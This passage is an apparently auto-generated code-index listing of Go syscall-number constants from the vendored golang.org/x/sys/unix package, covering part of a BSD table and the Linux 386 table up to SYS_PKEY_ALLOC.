SYS___CAP_RIGHTS_GET = 515 constant SYS_CAP_ENTER (line 342) | SYS_CAP_ENTER = 516 constant SYS_CAP_GETMODE (line 343) | SYS_CAP_GETMODE = 517 constant SYS_PDFORK (line 344) | SYS_PDFORK = 518 constant SYS_PDKILL (line 345) | SYS_PDKILL = 519 constant SYS_PDGETPID (line 346) | SYS_PDGETPID = 520 constant SYS_PSELECT (line 347) | SYS_PSELECT = 522 constant SYS_GETLOGINCLASS (line 348) | SYS_GETLOGINCLASS = 523 constant SYS_SETLOGINCLASS (line 349) | SYS_SETLOGINCLASS = 524 constant SYS_RCTL_GET_RACCT (line 350) | SYS_RCTL_GET_RACCT = 525 constant SYS_RCTL_GET_RULES (line 351) | SYS_RCTL_GET_RULES = 526 constant SYS_RCTL_GET_LIMITS (line 352) | SYS_RCTL_GET_LIMITS = 527 constant SYS_RCTL_ADD_RULE (line 353) | SYS_RCTL_ADD_RULE = 528 constant SYS_RCTL_REMOVE_RULE (line 354) | SYS_RCTL_REMOVE_RULE = 529 constant SYS_POSIX_FALLOCATE (line 355) | SYS_POSIX_FALLOCATE = 530 constant SYS_POSIX_FADVISE (line 356) | SYS_POSIX_FADVISE = 531 constant SYS_WAIT6 (line 357) | SYS_WAIT6 = 532 constant SYS_CAP_RIGHTS_LIMIT (line 358) | SYS_CAP_RIGHTS_LIMIT = 533 constant SYS_CAP_IOCTLS_LIMIT (line 359) | SYS_CAP_IOCTLS_LIMIT = 534 constant SYS_CAP_IOCTLS_GET (line 360) | SYS_CAP_IOCTLS_GET = 535 constant SYS_CAP_FCNTLS_LIMIT (line 361) | SYS_CAP_FCNTLS_LIMIT = 536 constant SYS_CAP_FCNTLS_GET (line 362) | SYS_CAP_FCNTLS_GET = 537 constant SYS_BINDAT (line 363) | SYS_BINDAT = 538 constant SYS_CONNECTAT (line 364) | SYS_CONNECTAT = 539 constant SYS_CHFLAGSAT (line 365) | SYS_CHFLAGSAT = 540 constant SYS_ACCEPT4 (line 366) | SYS_ACCEPT4 = 541 constant SYS_PIPE2 (line 367) | SYS_PIPE2 = 542 constant SYS_AIO_MLOCK (line 368) | SYS_AIO_MLOCK = 543 constant SYS_PROCCTL (line 369) | SYS_PROCCTL = 544 constant SYS_PPOLL (line 370) | SYS_PPOLL = 545 constant SYS_FUTIMENS (line 371) | SYS_FUTIMENS = 546 constant SYS_UTIMENSAT (line 372) | SYS_UTIMENSAT = 547 constant SYS_FDATASYNC (line 373) | SYS_FDATASYNC = 550 constant SYS_FSTAT (line 374) | SYS_FSTAT = 551 constant SYS_FSTATAT (line 375) | SYS_FSTATAT = 552 constant SYS_FHSTAT (line 376) | SYS_FHSTAT = 553 constant SYS_GETDIRENTRIES (line 377) | SYS_GETDIRENTRIES = 554 constant SYS_STATFS (line 378) | SYS_STATFS = 555 constant SYS_FSTATFS (line 379) | SYS_FSTATFS = 556 constant SYS_GETFSSTAT (line 380) | SYS_GETFSSTAT = 557 constant SYS_FHSTATFS (line 381) | SYS_FHSTATFS = 558 constant SYS_MKNODAT (line 382) | SYS_MKNODAT = 559 constant SYS_KEVENT (line 383) | SYS_KEVENT = 560 constant SYS_CPUSET_GETDOMAIN (line 384) | SYS_CPUSET_GETDOMAIN = 561 constant SYS_CPUSET_SETDOMAIN (line 385) | SYS_CPUSET_SETDOMAIN = 562 constant SYS_GETRANDOM (line 386) | SYS_GETRANDOM = 563 constant SYS_GETFHAT (line 387) | SYS_GETFHAT = 564 constant SYS_FHLINK (line 388) | SYS_FHLINK = 565 constant SYS_FHLINKAT (line 389) | SYS_FHLINKAT = 566 constant SYS_FHREADLINK (line 390) | SYS_FHREADLINK = 567 constant SYS___SYSCTLBYNAME (line 391) | SYS___SYSCTLBYNAME = 570 constant SYS_CLOSE_RANGE (line 392) | SYS_CLOSE_RANGE = 575 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_386.go constant SYS_RESTART_SYSCALL (line 9) | SYS_RESTART_SYSCALL = 0 constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAITPID (line 16) | SYS_WAITPID = 7 constant SYS_CREAT (line 17) | SYS_CREAT = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_EXECVE (line 20) | SYS_EXECVE = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_TIME (line 22) | SYS_TIME = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 16 constant SYS_BREAK (line 26) | SYS_BREAK = 17 constant SYS_OLDSTAT (line 27) | SYS_OLDSTAT = 18 constant SYS_LSEEK (line 28) | SYS_LSEEK = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UMOUNT (line 31) | SYS_UMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_STIME (line 34) | SYS_STIME = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_ALARM (line 36) | SYS_ALARM = 27 constant SYS_OLDFSTAT (line 37) | SYS_OLDFSTAT = 28 constant SYS_PAUSE (line 38) | SYS_PAUSE = 29 constant SYS_UTIME (line 39) | SYS_UTIME = 30 constant SYS_STTY (line 40) | SYS_STTY = 31 constant SYS_GTTY (line 41) | SYS_GTTY = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_NICE (line 43) | SYS_NICE = 34 constant SYS_FTIME (line 44) | SYS_FTIME = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_KILL (line 46) | SYS_KILL = 37 constant SYS_RENAME (line 47) | SYS_RENAME = 38 constant SYS_MKDIR (line 48) | SYS_MKDIR = 39 constant SYS_RMDIR (line 49) | SYS_RMDIR = 40 constant SYS_DUP (line 50) | SYS_DUP = 41 constant SYS_PIPE (line 51) | SYS_PIPE = 42 constant SYS_TIMES (line 52) | SYS_TIMES = 43 constant SYS_PROF (line 53) | SYS_PROF = 44 constant SYS_BRK (line 54) | SYS_BRK = 45 constant SYS_SETGID (line 55) | SYS_SETGID = 46 constant SYS_GETGID (line 56) | SYS_GETGID = 47 constant SYS_SIGNAL (line 57) | SYS_SIGNAL = 48 constant SYS_GETEUID (line 58) | SYS_GETEUID = 49 constant SYS_GETEGID (line 59) | SYS_GETEGID = 50 constant SYS_ACCT (line 60) | SYS_ACCT = 51 constant SYS_UMOUNT2 (line 61) | SYS_UMOUNT2 = 52 constant SYS_LOCK (line 62) | SYS_LOCK = 53 constant SYS_IOCTL (line 63) | SYS_IOCTL = 54 constant SYS_FCNTL (line 64) | SYS_FCNTL = 55 constant SYS_MPX (line 65) | SYS_MPX = 56 constant SYS_SETPGID (line 66) | SYS_SETPGID = 57 constant SYS_ULIMIT (line 67) | SYS_ULIMIT = 58 constant SYS_OLDOLDUNAME (line 68) | SYS_OLDOLDUNAME = 59 constant SYS_UMASK (line 69) | SYS_UMASK = 60 constant SYS_CHROOT (line 70) | SYS_CHROOT = 61 constant SYS_USTAT (line 71) | SYS_USTAT = 62 constant SYS_DUP2 (line 72) | SYS_DUP2 = 63 constant SYS_GETPPID (line 73) | SYS_GETPPID = 64 constant SYS_GETPGRP (line 74) | SYS_GETPGRP = 65 constant SYS_SETSID (line 75) | SYS_SETSID = 66 constant SYS_SIGACTION (line 76) | SYS_SIGACTION = 67 constant SYS_SGETMASK (line 77) | SYS_SGETMASK = 68 constant SYS_SSETMASK (line 78) | SYS_SSETMASK = 69 constant SYS_SETREUID (line 79) | SYS_SETREUID = 70 constant SYS_SETREGID (line 80) | SYS_SETREGID = 71 constant SYS_SIGSUSPEND (line 81) | SYS_SIGSUSPEND = 72 constant SYS_SIGPENDING (line 82) | SYS_SIGPENDING = 73 constant SYS_SETHOSTNAME (line 83) | SYS_SETHOSTNAME = 74 constant SYS_SETRLIMIT (line 84) | SYS_SETRLIMIT = 75 constant SYS_GETRLIMIT (line 85) | SYS_GETRLIMIT = 76 constant SYS_GETRUSAGE (line 86) | SYS_GETRUSAGE = 77 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 78 constant SYS_SETTIMEOFDAY (line 88) | SYS_SETTIMEOFDAY = 79 constant SYS_GETGROUPS (line 89) | SYS_GETGROUPS = 80 constant SYS_SETGROUPS (line 90) | SYS_SETGROUPS = 81 constant SYS_SELECT (line 91) | SYS_SELECT = 82 constant SYS_SYMLINK (line 92) | SYS_SYMLINK = 83 constant SYS_OLDLSTAT (line 93) | SYS_OLDLSTAT = 84 constant SYS_READLINK (line 94) | SYS_READLINK = 85 constant SYS_USELIB (line 95) | SYS_USELIB = 86 constant SYS_SWAPON (line 96) | SYS_SWAPON = 87 constant SYS_REBOOT (line 97) | SYS_REBOOT = 88 constant SYS_READDIR (line 98) | SYS_READDIR = 89 constant SYS_MMAP (line 99) | SYS_MMAP = 90 constant SYS_MUNMAP (line 100) | SYS_MUNMAP = 91 constant SYS_TRUNCATE (line 101) | SYS_TRUNCATE = 92 constant SYS_FTRUNCATE (line 102) | SYS_FTRUNCATE = 93 constant SYS_FCHMOD (line 103) | SYS_FCHMOD = 94 constant SYS_FCHOWN (line 104) | SYS_FCHOWN = 95 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 96 constant SYS_SETPRIORITY (line 106) | SYS_SETPRIORITY = 97 constant SYS_PROFIL (line 107) | SYS_PROFIL = 98 constant SYS_STATFS (line 108) | SYS_STATFS = 99 constant SYS_FSTATFS (line 109) | SYS_FSTATFS = 100 constant SYS_IOPERM (line 110) | SYS_IOPERM = 101 constant SYS_SOCKETCALL (line 111) | SYS_SOCKETCALL = 102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 103 constant SYS_SETITIMER (line 113) | SYS_SETITIMER = 104 constant SYS_GETITIMER (line 114) | SYS_GETITIMER = 105 constant SYS_STAT (line 115) | SYS_STAT = 106 constant SYS_LSTAT (line 116) | SYS_LSTAT = 107 constant SYS_FSTAT (line 117) | SYS_FSTAT = 108 constant SYS_OLDUNAME (line 118) | SYS_OLDUNAME = 109 constant SYS_IOPL (line 119) | SYS_IOPL = 110 constant SYS_VHANGUP (line 120) | SYS_VHANGUP = 111 constant SYS_IDLE (line 121) | SYS_IDLE = 112 constant SYS_VM86OLD (line 122) | SYS_VM86OLD = 113 constant SYS_WAIT4 (line 123) | SYS_WAIT4 = 114 constant SYS_SWAPOFF (line 124) | SYS_SWAPOFF = 115 constant SYS_SYSINFO (line 125) | SYS_SYSINFO = 116 constant SYS_IPC (line 126) | SYS_IPC = 117 constant SYS_FSYNC (line 127) | SYS_FSYNC = 118 constant SYS_SIGRETURN (line 128) | SYS_SIGRETURN = 119 constant SYS_CLONE (line 129) | SYS_CLONE = 120 constant SYS_SETDOMAINNAME (line 130) | SYS_SETDOMAINNAME = 121 constant SYS_UNAME (line 131) | SYS_UNAME = 122 constant SYS_MODIFY_LDT (line 132) | SYS_MODIFY_LDT = 123 constant SYS_ADJTIMEX (line 133) | SYS_ADJTIMEX = 124 constant SYS_MPROTECT (line 134) | SYS_MPROTECT = 125 constant SYS_SIGPROCMASK (line 135) | SYS_SIGPROCMASK = 126 constant SYS_CREATE_MODULE (line 136) | SYS_CREATE_MODULE = 127 constant SYS_INIT_MODULE (line 137) | SYS_INIT_MODULE = 128 constant SYS_DELETE_MODULE (line 138) | SYS_DELETE_MODULE = 129 constant SYS_GET_KERNEL_SYMS (line 139) | SYS_GET_KERNEL_SYMS = 130 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 131 constant SYS_GETPGID (line 141) | SYS_GETPGID = 132 constant SYS_FCHDIR (line 142) | SYS_FCHDIR = 133 constant SYS_BDFLUSH (line 143) | SYS_BDFLUSH = 134 constant SYS_SYSFS (line 144) | SYS_SYSFS = 135 constant SYS_PERSONALITY (line 145) | SYS_PERSONALITY = 136 constant SYS_AFS_SYSCALL (line 146) | SYS_AFS_SYSCALL = 137 constant SYS_SETFSUID (line 147) | SYS_SETFSUID = 138 constant SYS_SETFSGID (line 148) | SYS_SETFSGID = 139 constant SYS__LLSEEK (line 149) | SYS__LLSEEK = 140 constant SYS_GETDENTS (line 150) | SYS_GETDENTS = 141 constant SYS__NEWSELECT (line 151) | SYS__NEWSELECT = 142 constant SYS_FLOCK (line 152) | SYS_FLOCK = 143 constant SYS_MSYNC (line 153) | SYS_MSYNC = 144 constant SYS_READV (line 154) | SYS_READV = 145 constant SYS_WRITEV (line 155) | SYS_WRITEV = 146 constant SYS_GETSID (line 156) | SYS_GETSID = 147 constant SYS_FDATASYNC (line 157) | SYS_FDATASYNC = 148 constant SYS__SYSCTL (line 158) | SYS__SYSCTL = 149 constant SYS_MLOCK (line 159) | SYS_MLOCK = 150 constant SYS_MUNLOCK (line 160) | SYS_MUNLOCK = 151 constant SYS_MLOCKALL (line 161) | SYS_MLOCKALL = 152 constant SYS_MUNLOCKALL (line 162) | SYS_MUNLOCKALL = 153 constant SYS_SCHED_SETPARAM (line 163) | SYS_SCHED_SETPARAM = 154 constant SYS_SCHED_GETPARAM (line 164) | SYS_SCHED_GETPARAM = 155 constant SYS_SCHED_SETSCHEDULER (line 165) | SYS_SCHED_SETSCHEDULER = 156 constant SYS_SCHED_GETSCHEDULER (line 166) | SYS_SCHED_GETSCHEDULER = 157 constant SYS_SCHED_YIELD (line 167) | SYS_SCHED_YIELD = 158 constant SYS_SCHED_GET_PRIORITY_MAX (line 168) | SYS_SCHED_GET_PRIORITY_MAX = 159 constant SYS_SCHED_GET_PRIORITY_MIN (line 169) | SYS_SCHED_GET_PRIORITY_MIN = 160 constant SYS_SCHED_RR_GET_INTERVAL (line 170) | SYS_SCHED_RR_GET_INTERVAL = 161 constant SYS_NANOSLEEP (line 171) | SYS_NANOSLEEP = 162 constant SYS_MREMAP (line 172) | SYS_MREMAP = 163 constant SYS_SETRESUID (line 173) | SYS_SETRESUID = 164 constant SYS_GETRESUID (line 174) | SYS_GETRESUID = 165 constant SYS_VM86 (line 175) | SYS_VM86 = 166 constant SYS_QUERY_MODULE (line 176) | SYS_QUERY_MODULE = 167 constant SYS_POLL (line 177) | SYS_POLL = 168 constant SYS_NFSSERVCTL (line 178) | SYS_NFSSERVCTL = 169 constant SYS_SETRESGID (line 179) | SYS_SETRESGID = 170 constant SYS_GETRESGID (line 180) | SYS_GETRESGID = 171 constant SYS_PRCTL (line 181) | SYS_PRCTL = 172 constant SYS_RT_SIGRETURN (line 182) | SYS_RT_SIGRETURN = 173 constant SYS_RT_SIGACTION (line 183) | SYS_RT_SIGACTION = 174 constant SYS_RT_SIGPROCMASK (line 184) | SYS_RT_SIGPROCMASK = 175 constant SYS_RT_SIGPENDING (line 185) | SYS_RT_SIGPENDING = 176 constant SYS_RT_SIGTIMEDWAIT (line 186) | SYS_RT_SIGTIMEDWAIT = 177 constant SYS_RT_SIGQUEUEINFO (line 187) | SYS_RT_SIGQUEUEINFO = 178 constant SYS_RT_SIGSUSPEND (line 188) | SYS_RT_SIGSUSPEND = 179 constant SYS_PREAD64 (line 189) | SYS_PREAD64 = 180 constant SYS_PWRITE64 (line 190) | SYS_PWRITE64 = 181 constant SYS_CHOWN (line 191) | SYS_CHOWN = 182 constant SYS_GETCWD (line 192) | SYS_GETCWD = 183 constant SYS_CAPGET (line 193) | SYS_CAPGET = 184 constant SYS_CAPSET (line 194) | SYS_CAPSET = 185 constant SYS_SIGALTSTACK (line 195) | SYS_SIGALTSTACK = 186 constant SYS_SENDFILE (line 196) | SYS_SENDFILE = 187 constant SYS_GETPMSG (line 197) | SYS_GETPMSG = 188 constant SYS_PUTPMSG (line 198) | SYS_PUTPMSG = 189 constant SYS_VFORK (line 199) | SYS_VFORK = 190 constant SYS_UGETRLIMIT (line 200) | SYS_UGETRLIMIT = 191 constant SYS_MMAP2 (line 201) | SYS_MMAP2 = 192 constant SYS_TRUNCATE64 (line 202) | SYS_TRUNCATE64 = 193 constant SYS_FTRUNCATE64 (line 203) | SYS_FTRUNCATE64 = 194 constant SYS_STAT64 (line 204) | SYS_STAT64 = 195 constant SYS_LSTAT64 (line 205) | SYS_LSTAT64 = 196 constant SYS_FSTAT64 (line 206) | SYS_FSTAT64 = 197 constant SYS_LCHOWN32 (line 207) | SYS_LCHOWN32 = 198 constant SYS_GETUID32 (line 208) | SYS_GETUID32 = 199 constant SYS_GETGID32 (line 209) | SYS_GETGID32 = 200 constant SYS_GETEUID32 (line 210) | SYS_GETEUID32 = 201 constant SYS_GETEGID32 (line 211) | SYS_GETEGID32 = 202 constant SYS_SETREUID32 (line 212) | SYS_SETREUID32 = 203 constant SYS_SETREGID32 (line 213) | SYS_SETREGID32 = 204 constant SYS_GETGROUPS32 (line 214) | SYS_GETGROUPS32 = 205 constant SYS_SETGROUPS32 (line 215) | SYS_SETGROUPS32 = 206 constant SYS_FCHOWN32 (line 216) | SYS_FCHOWN32 = 207 constant SYS_SETRESUID32 (line 217) | SYS_SETRESUID32 = 208 constant SYS_GETRESUID32 (line 218) | SYS_GETRESUID32 = 209 constant SYS_SETRESGID32 (line 219) | SYS_SETRESGID32 = 210 constant SYS_GETRESGID32 (line 220) | SYS_GETRESGID32 = 211 constant SYS_CHOWN32 (line 221) | SYS_CHOWN32 = 212 constant SYS_SETUID32 (line 222) | SYS_SETUID32 = 213 constant SYS_SETGID32 (line 223) | SYS_SETGID32 = 214 constant SYS_SETFSUID32 (line 224) | SYS_SETFSUID32 = 215 constant SYS_SETFSGID32 (line 225) | SYS_SETFSGID32 = 216 constant SYS_PIVOT_ROOT (line 226) | SYS_PIVOT_ROOT = 217 constant SYS_MINCORE (line 227) | SYS_MINCORE = 218 constant SYS_MADVISE (line 228) | SYS_MADVISE = 219 constant SYS_GETDENTS64 (line 229) | SYS_GETDENTS64 = 220 constant SYS_FCNTL64 (line 230) | SYS_FCNTL64 = 221 constant SYS_GETTID (line 231) | SYS_GETTID = 224 constant SYS_READAHEAD (line 232) | SYS_READAHEAD = 225 constant SYS_SETXATTR (line 233) | SYS_SETXATTR = 226 constant SYS_LSETXATTR (line 234) | SYS_LSETXATTR = 227 constant SYS_FSETXATTR (line 235) | SYS_FSETXATTR = 228 constant SYS_GETXATTR (line 236) | SYS_GETXATTR = 229 constant SYS_LGETXATTR (line 237) | SYS_LGETXATTR = 230 constant SYS_FGETXATTR (line 238) | SYS_FGETXATTR = 231 constant SYS_LISTXATTR (line 239) | SYS_LISTXATTR = 232 constant SYS_LLISTXATTR (line 240) | SYS_LLISTXATTR = 233 constant SYS_FLISTXATTR (line 241) | SYS_FLISTXATTR = 234 constant SYS_REMOVEXATTR (line 242) | SYS_REMOVEXATTR = 235 constant SYS_LREMOVEXATTR (line 243) | SYS_LREMOVEXATTR = 236 constant SYS_FREMOVEXATTR (line 244) | SYS_FREMOVEXATTR = 237 constant SYS_TKILL (line 245) | SYS_TKILL = 238 constant SYS_SENDFILE64 (line 246) | SYS_SENDFILE64 = 239 constant SYS_FUTEX (line 247) | SYS_FUTEX = 240 constant SYS_SCHED_SETAFFINITY (line 248) | SYS_SCHED_SETAFFINITY = 241 constant SYS_SCHED_GETAFFINITY (line 249) | SYS_SCHED_GETAFFINITY = 242 constant SYS_SET_THREAD_AREA (line 250) | SYS_SET_THREAD_AREA = 243 constant SYS_GET_THREAD_AREA (line 251) | SYS_GET_THREAD_AREA = 244 constant SYS_IO_SETUP (line 252) | SYS_IO_SETUP = 245 constant SYS_IO_DESTROY (line 253) | SYS_IO_DESTROY = 246 constant SYS_IO_GETEVENTS (line 254) | SYS_IO_GETEVENTS = 247 constant SYS_IO_SUBMIT (line 255) | SYS_IO_SUBMIT = 248 constant SYS_IO_CANCEL (line 256) | SYS_IO_CANCEL = 249 constant SYS_FADVISE64 (line 257) | SYS_FADVISE64 = 250 constant SYS_EXIT_GROUP (line 258) | SYS_EXIT_GROUP = 252 constant SYS_LOOKUP_DCOOKIE (line 259) | SYS_LOOKUP_DCOOKIE = 253 constant SYS_EPOLL_CREATE (line 260) | SYS_EPOLL_CREATE = 254 constant SYS_EPOLL_CTL (line 261) | SYS_EPOLL_CTL = 255 constant SYS_EPOLL_WAIT (line 262) | SYS_EPOLL_WAIT = 256 constant SYS_REMAP_FILE_PAGES (line 263) | SYS_REMAP_FILE_PAGES = 257 constant SYS_SET_TID_ADDRESS (line 264) | SYS_SET_TID_ADDRESS = 258 constant SYS_TIMER_CREATE (line 265) | SYS_TIMER_CREATE = 259 constant SYS_TIMER_SETTIME (line 266) | SYS_TIMER_SETTIME = 260 constant SYS_TIMER_GETTIME (line 267) | SYS_TIMER_GETTIME = 261 constant SYS_TIMER_GETOVERRUN (line 268) | SYS_TIMER_GETOVERRUN = 262 constant SYS_TIMER_DELETE (line 269) | SYS_TIMER_DELETE = 263 constant SYS_CLOCK_SETTIME (line 270) | SYS_CLOCK_SETTIME = 264 constant SYS_CLOCK_GETTIME (line 271) | SYS_CLOCK_GETTIME = 265 constant SYS_CLOCK_GETRES (line 272) | SYS_CLOCK_GETRES = 266 constant SYS_CLOCK_NANOSLEEP (line 273) | SYS_CLOCK_NANOSLEEP = 267 constant SYS_STATFS64 (line 274) | SYS_STATFS64 = 268 constant SYS_FSTATFS64 (line 275) | SYS_FSTATFS64 = 269 constant SYS_TGKILL (line 276) | SYS_TGKILL = 270 constant SYS_UTIMES (line 277) | SYS_UTIMES = 271 constant SYS_FADVISE64_64 (line 278) | SYS_FADVISE64_64 = 272 constant SYS_VSERVER (line 279) | SYS_VSERVER = 273 constant SYS_MBIND (line 280) | SYS_MBIND = 274 constant SYS_GET_MEMPOLICY (line 281) | SYS_GET_MEMPOLICY = 275 constant SYS_SET_MEMPOLICY (line 282) | SYS_SET_MEMPOLICY = 276 constant SYS_MQ_OPEN (line 283) | SYS_MQ_OPEN = 277 constant SYS_MQ_UNLINK (line 284) | SYS_MQ_UNLINK = 278 constant SYS_MQ_TIMEDSEND (line 285) | SYS_MQ_TIMEDSEND = 279 constant SYS_MQ_TIMEDRECEIVE (line 286) | SYS_MQ_TIMEDRECEIVE = 280 constant SYS_MQ_NOTIFY (line 287) | SYS_MQ_NOTIFY = 281 constant SYS_MQ_GETSETATTR (line 288) | SYS_MQ_GETSETATTR = 282 constant SYS_KEXEC_LOAD (line 289) | SYS_KEXEC_LOAD = 283 constant SYS_WAITID (line 290) | SYS_WAITID = 284 constant SYS_ADD_KEY (line 291) | SYS_ADD_KEY = 286 constant SYS_REQUEST_KEY (line 292) | SYS_REQUEST_KEY = 287 constant SYS_KEYCTL (line 293) | SYS_KEYCTL = 288 constant SYS_IOPRIO_SET (line 294) | SYS_IOPRIO_SET = 289 constant SYS_IOPRIO_GET (line 295) | SYS_IOPRIO_GET = 290 constant SYS_INOTIFY_INIT (line 296) | SYS_INOTIFY_INIT = 291 constant SYS_INOTIFY_ADD_WATCH (line 297) | SYS_INOTIFY_ADD_WATCH = 292 constant SYS_INOTIFY_RM_WATCH (line 298) | SYS_INOTIFY_RM_WATCH = 293 constant SYS_MIGRATE_PAGES (line 299) | SYS_MIGRATE_PAGES = 294 constant SYS_OPENAT (line 300) | SYS_OPENAT = 295 constant SYS_MKDIRAT (line 301) | SYS_MKDIRAT = 296 constant SYS_MKNODAT (line 302) | SYS_MKNODAT = 297 constant SYS_FCHOWNAT (line 303) | SYS_FCHOWNAT = 298 constant SYS_FUTIMESAT (line 304) | SYS_FUTIMESAT = 299 constant SYS_FSTATAT64 (line 305) | SYS_FSTATAT64 = 300 constant SYS_UNLINKAT (line 306) | SYS_UNLINKAT = 301 constant SYS_RENAMEAT (line 307) | SYS_RENAMEAT = 302 constant SYS_LINKAT (line 308) | SYS_LINKAT = 303 constant SYS_SYMLINKAT (line 309) | SYS_SYMLINKAT = 304 constant SYS_READLINKAT (line 310) | SYS_READLINKAT = 305 constant SYS_FCHMODAT (line 311) | SYS_FCHMODAT = 306 constant SYS_FACCESSAT (line 312) | SYS_FACCESSAT = 307 constant SYS_PSELECT6 (line 313) | SYS_PSELECT6 = 308 constant SYS_PPOLL (line 314) | SYS_PPOLL = 309 constant SYS_UNSHARE (line 315) | SYS_UNSHARE = 310 constant SYS_SET_ROBUST_LIST (line 316) | SYS_SET_ROBUST_LIST = 311 constant SYS_GET_ROBUST_LIST (line 317) | SYS_GET_ROBUST_LIST = 312 constant SYS_SPLICE (line 318) | SYS_SPLICE = 313 constant SYS_SYNC_FILE_RANGE (line 319) | SYS_SYNC_FILE_RANGE = 314 constant SYS_TEE (line 320) | SYS_TEE = 315 constant SYS_VMSPLICE (line 321) | SYS_VMSPLICE = 316 constant SYS_MOVE_PAGES (line 322) | SYS_MOVE_PAGES = 317 constant SYS_GETCPU (line 323) | SYS_GETCPU = 318 constant SYS_EPOLL_PWAIT (line 324) | SYS_EPOLL_PWAIT = 319 constant SYS_UTIMENSAT (line 325) | SYS_UTIMENSAT = 320 constant SYS_SIGNALFD (line 326) | SYS_SIGNALFD = 321 constant SYS_TIMERFD_CREATE (line 327) | SYS_TIMERFD_CREATE = 322 constant SYS_EVENTFD (line 328) | SYS_EVENTFD = 323 constant SYS_FALLOCATE (line 329) | SYS_FALLOCATE = 324 constant SYS_TIMERFD_SETTIME (line 330) | SYS_TIMERFD_SETTIME = 325 constant SYS_TIMERFD_GETTIME (line 331) | SYS_TIMERFD_GETTIME = 326 constant SYS_SIGNALFD4 (line 332) | SYS_SIGNALFD4 = 327 constant SYS_EVENTFD2 (line 333) | SYS_EVENTFD2 = 328 constant SYS_EPOLL_CREATE1 (line 334) | SYS_EPOLL_CREATE1 = 329 constant SYS_DUP3 (line 335) | SYS_DUP3 = 330 constant SYS_PIPE2 (line 336) | SYS_PIPE2 = 331 constant SYS_INOTIFY_INIT1 (line 337) | SYS_INOTIFY_INIT1 = 332 constant SYS_PREADV (line 338) | SYS_PREADV = 333 constant SYS_PWRITEV (line 339) | SYS_PWRITEV = 334 constant SYS_RT_TGSIGQUEUEINFO (line 340) | SYS_RT_TGSIGQUEUEINFO = 335 constant SYS_PERF_EVENT_OPEN (line 341) | SYS_PERF_EVENT_OPEN = 336 constant SYS_RECVMMSG (line 342) | SYS_RECVMMSG = 337 constant SYS_FANOTIFY_INIT (line 343) | SYS_FANOTIFY_INIT = 338 constant SYS_FANOTIFY_MARK (line 344) | SYS_FANOTIFY_MARK = 339 constant SYS_PRLIMIT64 (line 345) | SYS_PRLIMIT64 = 340 constant SYS_NAME_TO_HANDLE_AT (line 346) | SYS_NAME_TO_HANDLE_AT = 341 constant SYS_OPEN_BY_HANDLE_AT (line 347) | SYS_OPEN_BY_HANDLE_AT = 342 constant SYS_CLOCK_ADJTIME (line 348) | SYS_CLOCK_ADJTIME = 343 constant SYS_SYNCFS (line 349) | SYS_SYNCFS = 344 constant SYS_SENDMMSG (line 350) | SYS_SENDMMSG = 345 constant SYS_SETNS (line 351) | SYS_SETNS = 346 constant SYS_PROCESS_VM_READV (line 352) | SYS_PROCESS_VM_READV = 347 constant SYS_PROCESS_VM_WRITEV (line 353) | SYS_PROCESS_VM_WRITEV = 348 constant SYS_KCMP (line 354) | SYS_KCMP = 349 constant SYS_FINIT_MODULE (line 355) | SYS_FINIT_MODULE = 350 constant SYS_SCHED_SETATTR (line 356) | SYS_SCHED_SETATTR = 351 constant SYS_SCHED_GETATTR (line 357) | SYS_SCHED_GETATTR = 352 constant SYS_RENAMEAT2 (line 358) | SYS_RENAMEAT2 = 353 constant SYS_SECCOMP (line 359) | SYS_SECCOMP = 354 constant SYS_GETRANDOM (line 360) | SYS_GETRANDOM = 355 constant SYS_MEMFD_CREATE (line 361) | SYS_MEMFD_CREATE = 356 constant SYS_BPF (line 362) | SYS_BPF = 357 constant SYS_EXECVEAT (line 363) | SYS_EXECVEAT = 358 constant SYS_SOCKET (line 364) | SYS_SOCKET = 359 constant SYS_SOCKETPAIR (line 365) | SYS_SOCKETPAIR = 360 constant SYS_BIND (line 366) | SYS_BIND = 361 constant SYS_CONNECT (line 367) | SYS_CONNECT = 362 constant SYS_LISTEN (line 368) | SYS_LISTEN = 363 constant SYS_ACCEPT4 (line 369) | SYS_ACCEPT4 = 364 constant SYS_GETSOCKOPT (line 370) | SYS_GETSOCKOPT = 365 constant SYS_SETSOCKOPT (line 371) | SYS_SETSOCKOPT = 366 constant SYS_GETSOCKNAME (line 372) | SYS_GETSOCKNAME = 367 constant SYS_GETPEERNAME (line 373) | SYS_GETPEERNAME = 368 constant SYS_SENDTO (line 374) | SYS_SENDTO = 369 constant SYS_SENDMSG (line 375) | SYS_SENDMSG = 370 constant SYS_RECVFROM (line 376) | SYS_RECVFROM = 371 constant SYS_RECVMSG (line 377) | SYS_RECVMSG = 372 constant SYS_SHUTDOWN (line 378) | SYS_SHUTDOWN = 373 constant SYS_USERFAULTFD (line 379) | SYS_USERFAULTFD = 374 constant SYS_MEMBARRIER (line 380) | SYS_MEMBARRIER = 375 constant SYS_MLOCK2 (line 381) | SYS_MLOCK2 = 376 constant SYS_COPY_FILE_RANGE (line 382) | SYS_COPY_FILE_RANGE = 377 constant SYS_PREADV2 (line 383) | SYS_PREADV2 = 378 constant SYS_PWRITEV2 (line 384) | SYS_PWRITEV2 = 379 constant SYS_PKEY_MPROTECT (line 385) | SYS_PKEY_MPROTECT = 380 constant SYS_PKEY_ALLOC 